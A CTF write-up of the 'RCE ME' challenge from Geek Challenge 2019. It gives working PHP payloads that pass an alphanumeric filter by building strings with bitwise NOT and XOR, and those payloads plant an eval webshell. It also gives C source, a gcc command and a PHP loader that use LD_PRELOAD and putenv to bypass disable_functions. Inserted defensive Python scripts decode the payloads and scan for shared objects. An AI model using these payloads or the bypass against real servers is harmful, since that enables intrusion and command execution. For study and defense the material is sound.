
[geek challenge 2019] rce me

2022-06-26 04:16:00 eliforsharon

Link: buuctf [Geek Challenge 2019] RCE ME.

Foreword

Ah, I learned a lot of new knowledge through this challenge, so I'm recording it here. I really procrastinate; that needs to change. It's a long way to go.

Non-alphanumeric RCE


The bypass uses bitwise negation or XOR: the payload is assembled from bytes that are not alphanumeric, and PHP's `~` or `^` operator turns them back into the intended string at runtime, so the filter never sees a letter or digit.
Here I want to construct a payload that connects AntSword, as shown below:

code=assert(eval($_POST['ma']));

or

code=$_=_GET;${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['ma']);

With the negation method, after PHP urlencode, the payload is:

code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%92%9E%DD%A2%D6%D6);

With the XOR method, after PHP urlencode, the payload is:

code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['ma']);
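From the defender's side, the useful skill is reading these payloads back out of a web server's access log. The following Python script is an added example, not code from the original writeup: it undoes the `~` and `^` constructs percent-encoded in a query string, reports which dangerous names (assert, eval, putenv, ...) the decoded text exposes, and counts high bytes, which never occur in ordinary ASCII parameters. The sample query strings are constructed for the demo (the first two are the payload shapes shown above, the third is benign traffic).

```python
"""Decode PHP non-alphanumeric (bitwise-NOT / XOR) payloads seen in query strings.

Added example, not code from the original writeup. The sample query strings
below are constructed for the demo.
"""
import re
from urllib.parse import unquote_to_bytes

SAMPLE_QUERIES = [
    "code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%DD%92%9E%DD%A2%D6%D6);",
    "code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=eval($_POST['ma']);",
    "page=home&lang=en",
]

PCT = r"(?:%[0-9A-Fa-f]{2})+"                           # one or more percent-encoded bytes
NOT_RE = re.compile(r"~(" + PCT + r")")                  # PHP  ~"...."
XOR_RE = re.compile(r"(" + PCT + r")\^(" + PCT + r")")   # PHP  "...." ^ "...."
HIGH_RE = re.compile(r"%[89A-Fa-f][0-9A-Fa-f]")          # bytes >= 0x80
SUSPICIOUS = ("assert", "eval", "system", "putenv", "include", "LD_PRELOAD", "_GET", "_POST")


def decode_not(token: str) -> str:
    """Undo PHP's bitwise NOT on each byte: ~0x9E == 0x61 == 'a'."""
    return bytes((~b) & 0xFF for b in unquote_to_bytes(token)).decode("latin-1")


def decode_xor(left: str, right: str) -> str:
    """Undo PHP's string XOR byte by byte: 0xFF ^ 0xA0 == 0x5F == '_'."""
    pairs = zip(unquote_to_bytes(left), unquote_to_bytes(right))
    return bytes(a ^ b for a, b in pairs).decode("latin-1")


def deobfuscate(query: str) -> str:
    """Replace every ~%XX.. and %XX..^%XX.. construct with the text it evaluates to."""
    q = re.sub(r"%5[Ee]", "^", query)   # the operators may themselves arrive percent-encoded
    q = re.sub(r"%7[Ee]", "~", q)
    q = XOR_RE.sub(lambda m: decode_xor(m.group(1), m.group(2)), q)
    q = NOT_RE.sub(lambda m: decode_not(m.group(1)), q)
    return q


def analyze(query: str) -> dict:
    """Return the decoded query, the dangerous names it exposes and a verdict."""
    decoded = deobfuscate(query)
    hits = [name for name in SUSPICIOUS if name in decoded]
    high_bytes = len(HIGH_RE.findall(query))
    return {
        "decoded": decoded,
        "hits": hits,
        "high_bytes": high_bytes,
        "suspicious": bool(hits) or high_bytes >= 4,
    }


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(analyze(q))
```

The name list is deliberately small; in production it would be a proper rule set, and the high-byte count is the more robust signal because it does not depend on guessing which function the attacker calls after decoding. Run as a script it prints one dict per sample; the first two decode to `(assert)((eval($_POST["ma"])))` and `$_=_GET;...`, which is exactly what the web server ends up executing.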

AntSword connects successfully.


Hijacking a shared .so

In AntSword I found the flag and an executable that reads it, so presumably running that executable gives the flag.
Via code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=phpinfo()
I found that most of the functions that can execute commands are disabled, orz.
Then I entered unfamiliar territory. Reference article: "LD_PRELOAD & putenv() explained in plain language".
You can use the AntSword plugin (Bypass disable_functions), or the files from GitHub; here I mainly record the method as I learned it from the underlying principle.

LD_PRELOAD

The shared library at the path named by the LD_PRELOAD environment variable is loaded ahead of all other shared libraries, and putenv() can set that environment variable from PHP.
So the idea is: write a PHP program that calls a function which lives in a shared library, then write a C program containing a function of the same name (holding the command you want to execute), build it into a .so shared library, and set that path as LD_PRELOAD via putenv(). When the PHP program runs, the dynamic linker's symbol-resolution rules make it call the same-named function we wrote, which is what hijacking the shared object means.

__attribute__((constructor))

Writing a function with the same name as a library function (such as geteuid) naturally works; a more general approach is __attribute__((constructor)), which runs as soon as the shared library is loaded, before the program proper starts.

Execution process

The first step is to write the C program:

#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>

/* Runs automatically when the shared object is loaded, before any code that uses it. */
__attribute__((__constructor__)) void angel(void) {
    /* Clear LD_PRELOAD first so the child spawned by system() does not load this library again. */
    unsetenv("LD_PRELOAD");
    system("/readflag > /var/tmp/1.txt");
}

Then build the shared library file 1.so:

gcc 1.c -fPIC -shared -o 1.so

Write the corresponding PHP program:

<?php
    // Point the dynamic linker at the uploaded library.
    putenv("LD_PRELOAD=/var/tmp/1.so");
    // mail() spawns the sendmail binary, a new process that honours LD_PRELOAD and so loads 1.so.
    mail("", "", "", "");
    // Read back the output the constructor wrote.
    var_dump(file_get_contents('/var/tmp/1.txt'));
?>

Upload the PHP file and the .so file.
Then use include to pull in the uploaded PHP file, which loads the shared library and executes the command.
The command to encode is:

code=$_=_GET;${$_}[_](${$_}[__]);&_=assert&__=include('/var/tmp/1.php');

The payload is:

code=$_=%ff%ff%ff%ff^%a0%b8%ba%ab;${$_}[_](${$_}[__]);&_=assert&__=include('/var/tmp/1.php');
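The whole chain above depends on one artifact on disk: an ELF shared object in a directory the PHP process can write to and read from (/var/tmp here). A cheap check for a defender is therefore an inventory of ELF files in PHP-writable directories, reporting whether each is a shared object and how many __attribute__((constructor)) function pointers its .init_array section holds. The Python script below is an added example, not code from the original writeup or the AntSword project; the temporary directory and the minimal ELF64 image it scans are constructed for the demo and are not loadable binaries.

```python
"""Find ELF shared objects in a directory PHP can write to.

Added example, not code from the original writeup. The sample directory and
the minimal ELF64 image are constructed for the demo.
"""
import os
import struct
import tempfile
from typing import List, Optional

ET_DYN = 3            # e_type of a shared object
SHT_INIT_ARRAY = 14   # section holding constructor function pointers
EHDR = struct.Struct("<16sHHIQQQIHHHHHH")   # Elf64_Ehdr, little-endian
SHDR = struct.Struct("<IIQQQQIIQQ")         # Elf64_Shdr


def inspect_elf(data: bytes) -> Optional[dict]:
    """Return object type and .init_array entry count for an ELF64 image, else None."""
    if len(data) < EHDR.size or data[:4] != b"\x7fELF" or data[4] != 2:
        return None
    hdr = EHDR.unpack_from(data)
    e_type, e_shoff, e_shentsize, e_shnum = hdr[1], hdr[6], hdr[11], hdr[12]
    init_entries = 0
    for i in range(e_shnum):
        off = e_shoff + i * e_shentsize
        if off + SHDR.size > len(data):
            break                         # truncated or hostile section table
        sh = SHDR.unpack_from(data, off)
        if sh[1] == SHT_INIT_ARRAY:
            init_entries += sh[5] // 8    # sh_size / sizeof(void *)
    return {"shared_object": e_type == ET_DYN, "init_array_entries": init_entries}


def scan_dir(root: str, max_bytes: int = 16 * 1024 * 1024) -> List[dict]:
    """Walk root and report every ELF64 file found."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)
            except OSError:
                continue
            info = inspect_elf(data)
            if info is not None:
                findings.append({"path": path, **info})
    return findings


def build_sample_so(init_entries: int) -> bytes:
    """Constructed minimal ELF64 ET_DYN image: header plus a section table only.

    It is not loadable; it just exercises the parser the way a real .so would.
    """
    shdrs = [SHDR.pack(0, 0, 0, 0, 0, 0, 0, 0, 0, 0)]   # mandatory SHT_NULL entry
    if init_entries:
        shdrs.append(SHDR.pack(0, SHT_INIT_ARRAY, 0, 0, 0, 8 * init_entries, 0, 0, 8, 8))
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8   # ELF64, little-endian, SysV ABI
    ehdr = EHDR.pack(ident, ET_DYN, 62, 1, 0, 0, EHDR.size, 0,
                     EHDR.size, 0, 0, SHDR.size, len(shdrs), 0)
    return ehdr + b"".join(shdrs)


def demo() -> List[dict]:
    """Drop a fake 1.so and a 1.php into a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        with open(os.path.join(tmp, "1.so"), "wb") as fh:
            fh.write(build_sample_so(init_entries=2))
        with open(os.path.join(tmp, "1.php"), "wb") as fh:
            fh.write(b"<?php echo 'not an ELF'; ?>")
        return scan_dir(tmp)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Two caveats: a normal gcc toolchain contributes an .init_array entry of its own, so the count is a hint rather than proof, and the parser ignores DT_INIT and 32-bit ELF. The primary signal is simply that an ELF object exists where a PHP worker writes; on the configuration side, the chain on this page needs putenv() plus a function that spawns a child process (mail() here), which is why putenv commonly appears in hardened disable_functions lists.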

Finally we get the flag.


Copyright notice
This article was written by [eliforsharon]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/02/202202180536406655.html